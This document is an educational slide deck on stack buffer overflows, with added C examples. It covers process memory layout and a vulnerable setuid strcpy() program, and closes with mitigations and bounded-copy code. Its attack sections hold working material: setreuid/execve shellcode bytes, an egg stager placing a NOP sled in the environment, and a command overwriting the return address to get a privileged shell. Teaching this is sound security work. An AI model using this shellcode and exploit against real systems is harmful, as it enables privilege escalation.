Basics of Buffer Overflow


S.S.G 방승원

Agenda
- Introduction
- Memory Structure
- Stack Structure, with an example
- Target Program
- Ready & Attack
- Attack & Security
- Application of Overflow

Introduction

Overflow? To overflow, to spill over; to flood; (of a container) to be full to the brim.

Buffer Overflow? An attack that feeds a program more data than the memory set aside for it, so that the excess overwrites a particular region, changes the program's control flow, and gets code of the attacker's choosing executed. <Phrack Magazine 49-14>, Aleph One ("Smashing the Stack for Fun and Profit")

Memory Structure

A process image, from low to high address:

  LOW    TEXT  : program code
         DATA  : static variables, global variables
         HEAP  : dynamic allocation (grows upward, toward high addresses)
         STACK : local variables and per-call data (grows downward, toward low addresses)
  HIGH

Stack Structure

LIFO (Last In, First Out): PUSH places an item on top of the stack, POP takes the top item off. Two registers describe the current frame: SP (Stack Pointer) points at the top of the stack, BP (Base Pointer) at the base of the current frame.

On this target the process image runs from memory LOW (0x08048000) to memory HIGH (0xbfffffff). The stack starts at the HIGH end and grows toward LOW, so the top of the stack (SP) is the lowest address in use:

  memory LOW  (0x08048000) / stack HIGH
        C        <- SP: pushed last, popped first
        B
        A        <- BP side: pushed first
  memory HIGH (0xbfffffff) / stack LOW

Example Program

  #include <stdio.h>

  void func(int a, int b, int c)
  {
      int buf1;          /* 4-byte local   */
      char buf2[16];     /* 16-byte local  */
  }

  int main(void)
  {
      func(1, 2, 3);
      printf("Hello, World!\n");
      return 0;
  }

Example Program: the stack while func() runs

  memory LOW (0x08048000) / stack HIGH
        buf2 [16]                          <- ESP (top of stack)
        buf1 [4]
        Stack Frame Pointer (saved EBP)    <- EBP
        Return Address
        1   (a)
        2   (b)
        3   (c)
  memory HIGH (0xbfffffff) / stack LOW

Example Program: what the compiler emits (gcc, 32-bit x86, AT&T syntax)

  main:
      pushl $3            # arguments are pushed right to left ...
      pushl $2
      pushl $1            # ... so a (1) ends up at the lowest address
      call  func          # pushes the return address, jumps to func
      addl  $16, %esp     # caller discards the arguments (16 rather than 12: includes alignment padding reserved before the pushes)

  func:
      pushl %ebp          # save the caller's frame pointer (SFP)
      movl  %esp, %ebp    # this frame's base
      subl  $40, %esp     # room for buf1, buf2 and padding (the "Dummy" below)
      leave               # movl %ebp, %esp ; popl %ebp
      ret                 # pops the return address into EIP

Resulting frame, low to high address:

  memory LOW (0x08048000) / stack HIGH
        buf2 [16]                       <- ESP after the subl
        buf1 [4]
        Dummy (padding)
        Stack Frame Pointer (saved EBP) <- EBP
        Return Address
        1
        2
        3
  memory HIGH (0xbfffffff) / stack LOW
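To see this layout in a real process rather than in a diagram, here is an added example (not from the original slides) that measures, from inside a function, how many bytes separate a local buffer from the saved frame pointer and the return address. It relies on the x86-style frame the slides describe (locals below the frame pointer, then the saved frame pointer, then the return address) and on the GCC/Clang builtin __builtin_frame_address; the struct and function names are the example's own. On a 64-bit host the pointers are 8 bytes and the gap can include alignment or stack-protector bytes, which is the "Dummy" region of the slide.

```c
/* Added example, not from the original slides: measure a real frame.
 * Assumes an x86-style layout (locals below the frame pointer, then the
 * saved frame pointer, then the return address) and GCC/Clang builtins. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct frame_probe {
    uintptr_t buf;       /* address of buf[0] inside probe_frame()           */
    uintptr_t sfp;       /* address of the saved frame pointer slot (SFP)    */
    uintptr_t ret;       /* address of the return address slot (RET)         */
    size_t    to_sfp;    /* bytes an overflow of buf must write to reach SFP */
    size_t    to_ret;    /* ... and to reach RET                             */
};

/* noinline: the measurement is only meaningful inside this function's
   own frame, so the compiler must not merge it into the caller. */
__attribute__((noinline)) static struct frame_probe probe_frame(void)
{
    volatile char buf[16];           /* volatile: keep it on the stack */
    struct frame_probe p;
    size_t i;

    for (i = 0; i < sizeof buf; i++)
        buf[i] = 'A';

    p.buf = (uintptr_t)buf;
    /* __builtin_frame_address(0) is this function's frame pointer (EBP on
       32-bit x86, RBP on x86-64). The caller's saved frame pointer is
       stored at that address and the return address one pointer above. */
    p.sfp = (uintptr_t)__builtin_frame_address(0);
    p.ret = p.sfp + sizeof(void *);
    p.to_sfp = p.sfp - p.buf;
    p.to_ret = p.ret - p.buf;
    return p;
}

/* Sanity check: buf lies below SFP and the distance is at least the
   buffer's own size, i.e. writing past buf runs toward SFP and RET. */
static int layout_is_stack_like(struct frame_probe p)
{
    return p.sfp > p.buf && p.to_sfp >= 16 &&
           p.to_ret == p.to_sfp + sizeof(void *);
}

int main(void)
{
    struct frame_probe p = probe_frame();
    printf("buf       : %#lx\n", (unsigned long)p.buf);
    printf("saved EBP : %#lx  (%zu bytes after buf[0])\n",
           (unsigned long)p.sfp, p.to_sfp);
    printf("RET slot  : %#lx  (%zu bytes after buf[0])\n",
           (unsigned long)p.ret, p.to_ret);
    printf("padding between buf and SFP: %zu bytes\n", p.to_sfp - 16);
    return layout_is_stack_like(p) ? 0 : 1;
}
```

The number printed as padding is the "Dummy" of the slides for this compiler and build; the attack later in the deck needs exactly that distance (buffer size plus padding plus the size of SFP) before the bytes that land on RET.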

Target Program

  #include <stdio.h>
  #include <string.h>

  void func(char *str)
  {
      char buf[64];
      strcpy(buf, str);      /* no bound: the overflow happens here */
  }

  int main(int argc, char *argv[])
  {
      func(argv[1]);
      printf("Hello, World\n");
      return 0;
  }

argc, argv: how a program receives the arguments it is run with.
  ex) ./target bang 1234
      argc    = 3;
      argv[0] = "target";
      argv[1] = "bang";
      argv[2] = "1234";
  (Run with no argument, argv[1] is NULL and strcpy() crashes before any overflow.)

strcpy(dest, src): copies the string that src points to into dest. It has no size limit, which is what creates the overflow vulnerability.

Target Program: the setuid bit

target has the setuid bit set: Set User ID bit (mode 4000).
  $ chmod 4755 target        (or chmod u+s target)
  -rwsr-xr-x 1 level1 level1 target
Whichever user runs target runs it with level1's user privileges (the familiar example is passwd, which is setuid root). That is what makes hijacking this binary worthwhile: a shell spawned from inside it inherits level1's uid.

Environment used on the slides: Red Hat 9.0, kernel 2.4.32, gcc 3.2.2-5.

Target Program: first run

Run the program with a lot of 'A' characters as its argument.
Result: Segmentation Fault. Why?

Target Program: func()'s frame

  memory LOW (0x08048000) / stack HIGH
        buf [64]             <- ESP side; strcpy() starts writing at buf[0]
        Dummy (padding)
        SFP (saved EBP)      <- EBP
        RET (return address into main)
        str = argv[1]        (func's argument)
  memory HIGH (0xbfffffff) / stack LOW

strcpy() fills buf from its lowest address toward higher addresses, that is, toward SFP and RET.

Target Program: 71, 72 and 80 bytes of input

The frame, low to high address, with the sizes the compiler chose. The byte values are illustrative and are shown as they sit in memory; each 4-byte word is little-endian, so SFP bytes "BB FF FF BF" read back as 0xbfffffbb.

  field      size       contents
  buf        64 bytes   the copied string
  Dummy       8 bytes   padding
  SFP         4 bytes   saved EBP
  RET         4 bytes   return address
  str         4 bytes   argument (pointer to argv[1])

Normal: $ ./target `perl -e 'print "A"x71'`
  [ AAAA...A\0 (71 'A' + NUL = 72 bytes) ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
  buf and Dummy are exactly filled; SFP, RET and str are untouched.

Overflow: $ ./target `perl -e 'print "A"x72'`
  [ AAAA...A (72 'A') ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
  strcpy() also copies the terminating NUL, so the 73rd byte lands on the low byte of SFP: 0xbfffffbb becomes 0xbfffff00. func() still returns to the right place, but main() continues with a corrupted EBP.

Real Overflow: $ ./target `perl -e 'print "A"x80'`
  [ AAAA...A (80 'A') ][ AAAA ][ AAAA ][ BBFFFFBB ]
  SFP and RET both become 0x41414141 ("AAAA"); the terminating NUL lands one byte further, on the low byte of str. When func() executes ret, EIP becomes 0x41414141, which is not mapped: Segmentation Fault.
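The three runs above can be reproduced without the setuid binary. The following is an added example, not from the original slides: a byte-level model of func()'s frame in the layout the slides draw ([buf 64][Dummy 8][SFP 4][RET 4][str 4], 32-bit, little-endian), plus an unbounded copy with strcpy()'s semantics (the terminating NUL is copied too). The initial SFP, RET and str bytes are the slides' illustrative values; the field and function names are the example's own. The last case is the payload from the Attack slide (76 filler bytes, then the egg address), so it also shows how RET ends up pointing at the shellcode.

```c
/* Added example (not from the original slides): a model of func()'s frame
 * and of an unbounded strcpy() into it. 32-bit, little-endian, stack
 * growing down; initial saved words are the slides' illustrative bytes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   64
#define DUMMY_SIZE  8

/* func()'s frame in increasing address order. Every field is a byte
   array, so the model has no padding of its own: sizeof == 84. */
struct frame {
    unsigned char buf[BUF_SIZE];      /* offset  0: strcpy() destination */
    unsigned char dummy[DUMMY_SIZE];  /* offset 64: compiler padding     */
    unsigned char sfp[4];             /* offset 72: saved EBP            */
    unsigned char ret[4];             /* offset 76: return address       */
    unsigned char str[4];             /* offset 80: argument (argv[1])   */
};

enum { SFP, RET, STR };

static uint32_t le32(const unsigned char b[4])
{
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

static void put_le32(unsigned char b[4], uint32_t v)
{
    b[0] = (unsigned char)v;         b[1] = (unsigned char)(v >> 8);
    b[2] = (unsigned char)(v >> 16); b[3] = (unsigned char)(v >> 24);
}

/* The frame before strcpy(): buf holds stack garbage, the saved words
   carry the byte patterns the slides show (BB FF FF BF and so on). */
static struct frame fresh_frame(void)
{
    struct frame f;
    memset(&f, 0xcc, sizeof f);
    put_le32(f.sfp, 0xbfffffbb);   /* bytes BB FF FF BF */
    put_le32(f.ret, 0x08ffffbb);   /* bytes BB FF FF 08 */
    put_le32(f.str, 0xbbffffbb);   /* bytes BB FF FF BB */
    return f;
}

/* strcpy(buf, src) with no bound: strlen(src) + 1 bytes, NUL included,
   from buf[0] onward into whatever follows. The only refusal is an input
   that would leave the 84 modelled bytes (the model's limit, not a limit
   of the real copy). Returns the number of bytes written. */
static size_t unchecked_copy(struct frame *f, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > sizeof *f)
        return 0;
    memcpy((unsigned char *)f, src, n);   /* buf sits at offset 0 */
    return n;
}

/* `pad` bytes of 'A', optionally followed by a little-endian address (the
   shell's printf "\x60\xfa\xff\xbf" on the Attack slide). An address
   containing a 0x00 byte would end the string early, as it would for
   strcpy(). */
static void build_input(char *out, size_t pad, int with_addr, uint32_t addr)
{
    memset(out, 'A', pad);
    if (with_addr) {
        put_le32((unsigned char *)out + pad, addr);
        pad += 4;
    }
    out[pad] = '\0';
}

/* Copy one input into a fresh frame and return the result. */
static struct frame overflow_case(size_t pad, int with_addr, uint32_t addr)
{
    char input[128];
    struct frame f = fresh_frame();
    build_input(input, pad, with_addr, addr);
    unchecked_copy(&f, input);
    return f;
}

/* One saved word (SFP, RET or str) after the copy, for inspection. */
static uint32_t word_after(int which, size_t pad, int with_addr, uint32_t addr)
{
    struct frame f = overflow_case(pad, with_addr, addr);
    return le32(which == SFP ? f.sfp : which == RET ? f.ret : f.str);
}

int main(void)
{
    static const struct { const char *label; size_t pad; int a; uint32_t addr; }
    cases[] = {
        { "71 x 'A' (normal)",        71, 0, 0 },
        { "72 x 'A' (overflow)",      72, 0, 0 },
        { "80 x 'A' (real overflow)", 80, 0, 0 },
        { "76 x 'A' + egg address",   76, 1, 0xbffffa60 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-26s SFP=%#010x RET=%#010x str=%#010x\n", cases[i].label,
               (unsigned)word_after(SFP, cases[i].pad, cases[i].a, cases[i].addr),
               (unsigned)word_after(RET, cases[i].pad, cases[i].a, cases[i].addr),
               (unsigned)word_after(STR, cases[i].pad, cases[i].a, cases[i].addr));
    return 0;
}
```

Reading the output against the slides: 71 bytes leave every saved word alone, 72 bytes zero the low byte of SFP, 80 bytes turn SFP and RET into 0x41414141 and zero the low byte of str, and 76 bytes plus the address put 0xbffffa60 into RET with SFP still 0x41414141.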

Target Program: the compiled code and the frame before and after

func() and its call site as compiled (the 72-byte frame is buf plus 8 bytes of padding; buf starts at -72(%ebp)):

  func:
      pushl %ebp
      movl  %esp, %ebp
      subl  $72, %esp          # 64 bytes buf + 8 bytes Dummy
      subl  $8, %esp
      pushl 8(%ebp)            # str (second strcpy argument)
      leal  -72(%ebp), %eax
      pushl %eax               # buf (first strcpy argument)
      call  strcpy
      addl  $16, %esp
      leave
      ret

  main:
      movl  12(%ebp), %eax     # argv
      addl  $4, %eax           # &argv[1]
      pushl (%eax)             # argv[1]
      call  func
      subl  $12, %esp

Before the overflow (low to high address):

  memory LOW (0x08048000) / stack HIGH
        buf    [ A ... ]        <- SP
        Dummy
        SFP    [ BFFFFFBF ]     <- EBP
        RET    [ BBFFFF08 ]
        str
  memory HIGH (0xbfffffff) / stack LOW

After 80 bytes of 'A':

  memory LOW (0x08048000) / stack HIGH
        buf    [ A ... ]        <- SP
        Dummy  [ AAAA ]
        SFP    [ AAAA ]         <- EBP; leave pops 0x41414141 into EBP
        RET    [ AAAA ]         <- ret pops 0x41414141 into EIP: 0x41414141 (??)
        str
  memory HIGH (0xbfffffff) / stack LOW

Shell Code

Code that spawns a shell. In C, what the shellcode has to do: setreuid() to level1's uid 3001, so that both real and effective uid are 3001 and the shell keeps the setuid privilege, then execve("/bin/sh"):

  #include <unistd.h>

  int main(void)
  {
      char *shell[2];
      setreuid(3001, 3001);
      shell[0] = "/bin/sh";
      shell[1] = NULL;
      execve(shell[0], shell, NULL);
      return 0;
  }

The same thing as machine code (x86 Linux; it contains no NUL byte, so strcpy() copies all of it):

  /* setreuid(3001, 3001): xor eax,eax; xor ebx,ebx; xor ecx,ecx;
     mov bx,0x0bb9; mov cx,0x0bb9; mov al,0x46; int 0x80 */
  "\x31\xc0\x31\xdb\x31\xc9\x66\xbb\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46\xcd\x80"
  /* execve("/bin/sh"): Aleph One's jmp/call trick to get the string's address */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
  "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
  "/bin/sh"

Attack Ready

1. Confirm the Segmentation Fault (RET is under our control).
2. Write the shellcode.
3. If the shellcode is put into the buffer itself, we need the buffer's address, and a stack buffer's address is hard to guess.
4. So instead the shellcode is placed in a shell environment variable and a helper, Eggshell, computes the address of that variable (the helper puts a run of NOP instructions in front of the shellcode, so the return address only has to land somewhere in that run).

Attack

  bash-2.05b$ ./egg 512 200
  Using address: 0xbffffa60
  bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")`
  sh-2.05b$ id
  uid=3001(level1) gid=1000(guest) groups=1000(guest)
  sh-2.05b$

76 bytes of filler cover buf (64), Dummy (8) and SFP (4); the next four bytes overwrite RET with 0xbffffa60 written least-significant byte first (little-endian), the address egg reported for the shellcode. func() returns into the egg instead of into main(), and the resulting shell runs as level1.
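Two checks an exploit writer runs on the shellcode from the Shell Code slide before pairing it with a strcpy() overflow, and a C version of what the egg helper in the session above does, as an added example that is not part of the original slides: (1) the bytes must contain no 0x00, or strcpy() stops copying partway through; (2) the jmp/call pair must really land on the pop %esi and leave "/bin/sh" right after the call. The shellcode bytes are the slide's; the environment-variable name EGG, the NOP sled (512 is read as the sled size from "./egg 512 200"; the slide does not say what the 200 means) and the mid-sled address estimate are this example's own assumptions, and the address is only meaningful on the slides' 32-bit target without stack randomization.

```c
/* Added example, not from the original slides. Shellcode bytes are the
 * ones on the Shell Code slide; EGG, the sled size and the address guess
 * are assumptions for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* setenv() is POSIX; declared here as well in case of strict ISO mode. */
extern int setenv(const char *name, const char *value, int overwrite);

static const unsigned char shellcode[] =
    /* setreuid(3001, 3001): xor eax,eax; xor ebx,ebx; xor ecx,ecx;
       mov bx,0x0bb9; mov cx,0x0bb9; mov al,70; int 0x80 */
    "\x31\xc0\x31\xdb\x31\xc9\x66\xbb\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46\xcd\x80"
    /* execve("/bin/sh"): jmp short to the call; pop esi gets the string's
       address; build argv[]; int 0x80; then exit */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff"
    "/bin/sh";

#define SHELLCODE_LEN (sizeof shellcode - 1)   /* drop the literal's NUL */

static size_t shellcode_length(void) { return SHELLCODE_LEN; }

/* strcpy() stops at the first 0x00, so a NUL inside the shellcode
   truncates the copy. Returns its offset, or -1 if there is none. */
static long first_nul(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0)
            return (long)i;
    return -1;
}

/* Target of a short jmp (EB rel8) at offset `at`. */
static size_t jmp_short_target(size_t at)
{
    return (size_t)((long)at + 2 + (int8_t)shellcode[at + 1]);
}

/* Target of a call (E8 rel32) at offset `at`. */
static size_t call_rel32_target(size_t at)
{
    uint32_t u = (uint32_t)shellcode[at + 1]       | (uint32_t)shellcode[at + 2] << 8 |
                 (uint32_t)shellcode[at + 3] << 16 | (uint32_t)shellcode[at + 4] << 24;
    return (size_t)((long)at + 5 + (int32_t)u);
}

/* Follow the jmp/call trick from the jmp at `jmp_at`: the jmp must reach a
   call, the call must come back to the pop %esi (0x5e) right after the
   jmp, and the bytes after the call are the "/bin/sh" string. Returns the
   string's offset, or -1 if the structure does not hold. */
static long jmp_call_string_offset(size_t jmp_at)
{
    if (shellcode[jmp_at] != 0xeb) return -1;
    size_t call_at = jmp_short_target(jmp_at);
    if (call_at + 5 > SHELLCODE_LEN || shellcode[call_at] != 0xe8) return -1;
    size_t pop_at = call_rel32_target(call_at);
    if (pop_at != jmp_at + 2 || shellcode[pop_at] != 0x5e) return -1;
    return (long)(call_at + 5);
}

/* What the egg helper stages: <NOP sled><shellcode> as the value of an
   environment variable. Returns a malloc'd NUL-terminated value. */
static unsigned char *build_egg(size_t sled, size_t *len)
{
    *len = sled + SHELLCODE_LEN;
    unsigned char *egg = malloc(*len + 1);
    if (egg == NULL) return NULL;
    memset(egg, 0x90, sled);                       /* 0x90 = x86 NOP */
    memcpy(egg + sled, shellcode, SHELLCODE_LEN);
    egg[*len] = '\0';
    return egg;
}

/* Check the staged egg: a sled of NOPs, then the shellcode, nothing else. */
static int egg_layout_ok(size_t sled)
{
    size_t len, i;
    unsigned char *egg = build_egg(sled, &len);
    int ok = egg != NULL && len == sled + SHELLCODE_LEN;
    for (i = 0; ok && i < sled; i++) ok = egg[i] == 0x90;
    ok = ok && memcmp(egg + sled, shellcode, SHELLCODE_LEN) == 0;
    free(egg);
    return ok;
}

/* Export the egg (a child such as ./target inherits the environment) and
   guess where the shellcode will be: anywhere in the sled works, so aim at
   its middle. Assumption: on the slides' 32-bit, non-randomized target the
   environment block lands at a predictable address; on an ASLR host the
   value is only this process's own. Returns 0 on failure. */
static uintptr_t stage_egg(size_t sled)
{
    size_t len;
    unsigned char *egg = build_egg(sled, &len);
    int rc = egg ? setenv("EGG", (const char *)egg, 1) : -1;
    free(egg);                       /* setenv() keeps its own copy */
    const char *in_env = rc == 0 ? getenv("EGG") : NULL;
    return in_env ? (uintptr_t)in_env + sled / 2 : 0;
}

int main(void)
{
    printf("shellcode: %zu bytes, first NUL at %ld, /bin/sh at offset %ld\n",
           shellcode_length(), first_nul(shellcode, SHELLCODE_LEN),
           jmp_call_string_offset(18));   /* 18: the execve part starts here */
    printf("Using address: %#lx\n", (unsigned long)stage_egg(512));
    return 0;
}
```

The 63 bytes also fit inside the 64-byte buf, which is why the slides could have used the buffer itself had its address been easier to predict; with the egg in the environment, the overflow only needs to write the address printed above into RET.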

Attack vs. Security

  Non-executable stack         -> Return-into-libc, Omega Project
  StackGuard and StackShield   -> bypassing StackGuard and StackShield
  Randomized stacks
  Exec Shield (kernel level)   -> Exec Shield evasion
  Avoid strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() and the like
    -> use strncpy(), strncat() (with care: strncpy() adds no terminating NUL when the source fills the whole limit, so the destination must be terminated explicitly and truncation checked)
  And so on...
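Bounded replacements for the target program's strcpy(buf, str), and the strncpy() pitfall behind the caveat above, as an added example that is not part of the original slides. The function names and the 64-byte buffer follow the target program; the inputs are constructed runs of 'A' like the argv[1] used in the attack. snprintf() is shown alongside because it is the standard-C call that both bounds the copy and always terminates it.

```c
/* Added example, not from the original slides: bounded replacements for
 * strcpy(buf, str) in the target program, and why strncpy() alone is not
 * enough. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* The "use strncpy()" advice as usually applied. strncpy() copies at most
   n bytes and NUL-pads only when src is shorter than n; when src has n or
   more bytes it writes n non-NUL bytes and no terminator, so a later
   printf("%s", buf) reads past the buffer. Returns 1 if buf ended up
   NUL-terminated. */
static int copy_strncpy(char *buf, size_t n, const char *src)
{
    strncpy(buf, src, n);
    return memchr(buf, '\0', n) != NULL;
}

/* A bounded copy that always terminates and reports truncation: returns
   the number of bytes stored (excluding the NUL), or -1 if src was cut. */
static long copy_bounded(char *buf, size_t n, const char *src)
{
    size_t len = strlen(src);
    if (n == 0)
        return -1;
    if (len >= n) {                 /* no room for src plus its NUL */
        memcpy(buf, src, n - 1);
        buf[n - 1] = '\0';
        return -1;
    }
    memcpy(buf, src, len + 1);
    return (long)len;
}

/* snprintf() gives the same guarantee; its return value is the length it
   wanted to write, so a value >= n means the copy was truncated. */
static long copy_snprintf(char *buf, size_t n, const char *src)
{
    int want = snprintf(buf, n, "%s", src);
    return (want < 0 || (size_t)want >= n) ? -1 : want;
}

struct copy_report {
    int  strncpy_terminated;   /* 1 if strncpy() left a NUL inside buf */
    long bounded;              /* copy_bounded() result                */
    long snprintf_ret;         /* copy_snprintf() result               */
};

/* Feed `len` bytes of 'A' (a constructed argv[1]) through all three into
   a BUF_SIZE-byte buffer. */
static struct copy_report try_copies(size_t len)
{
    char src[256];
    char buf[BUF_SIZE];
    struct copy_report r;

    if (len > sizeof src - 1)
        len = sizeof src - 1;
    memset(src, 'A', len);
    src[len] = '\0';

    r.strncpy_terminated = copy_strncpy(buf, sizeof buf, src);
    r.bounded = copy_bounded(buf, sizeof buf, src);
    r.snprintf_ret = copy_snprintf(buf, sizeof buf, src);
    return r;
}

int main(void)
{
    static const size_t lens[] = { 10, 63, 64, 80 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        struct copy_report r = try_copies(lens[i]);
        printf("%3zu bytes: strncpy terminated=%d  bounded=%ld  snprintf=%ld\n",
               lens[i], r.strncpy_terminated, r.bounded, r.snprintf_ret);
    }
    return 0;
}
```

At 63 bytes all three leave a valid string; at 64 and 80 bytes strncpy() leaves none, while the other two truncate to 63 bytes, terminate, and say so. The 80-byte case is the slides' "real overflow" input, and here it never reaches SFP or RET.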

Application of Overflow

  Platforms : Windows, Unix, Linux, Mac
  Vectors   : local, remote, web (ActiveX)
  Variants  : heap overflow, integer overflow, frame pointer overwrite